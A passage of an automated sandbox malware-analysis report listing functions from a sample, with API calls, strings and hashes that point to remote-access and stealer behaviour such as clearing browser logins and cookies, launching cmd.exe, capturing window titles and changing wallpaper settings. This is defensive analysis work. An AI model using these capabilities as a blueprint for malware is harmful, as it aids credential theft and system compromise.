                                • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                Download Yara Rule
                                APIs
                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FormatFreeLocalMessage
                                • String ID: @J@$PkGNG
                                • API String ID: 1427518018-1416487119
                                • Opcode ID: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                • Opcode Fuzzy Hash: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Control Panel\Desktop
                                • API String ID: 1818849710-27424756
                                • Opcode ID: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                • Opcode Fuzzy Hash: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041361B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,(x), ref: 0041363D
                                • RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                • RegCloseKey.ADVAPI32(?), ref: 00413665
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: (x
                                • API String ID: 3677997916-2016957024
                                • Opcode ID: 1fc720c5af09767de5d5cc7bb63512f3198692daef6ba2e2d38df8188ddc2fef
                                • Instruction ID: f34a781dc69553a1478c4d1e38e8143fd29b0d6f10a6f19acb5bd71dd86b2662
                                • Opcode Fuzzy Hash: 1fc720c5af09767de5d5cc7bb63512f3198692daef6ba2e2d38df8188ddc2fef
                                • Instruction Fuzzy Hash: 00F04F75600218FBDF209B90DC05FDD77BCEB04B11F1040A2BA45B5291DB749F849BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                • ShowWindow.USER32(00000009), ref: 00416C61
                                • SetForegroundWindow.USER32 ref: 00416C6D
                                  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                  • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                • String ID: !D@
                                • API String ID: 186401046-604454484
                                • Opcode ID: cc4916408580e951ac93bfe67ce7d507046645e77a3ccf4d0f5d95b4476223b5
                                • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                • Opcode Fuzzy Hash: cc4916408580e951ac93bfe67ce7d507046645e77a3ccf4d0f5d95b4476223b5
                                • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                • Opcode Fuzzy Hash: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                • Opcode Fuzzy Hash: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: SystemTimes$Sleep__aulldiv
                                • String ID:
                                • API String ID: 188215759-0
                                • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID:
                                • API String ID: 4116985748-0
                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
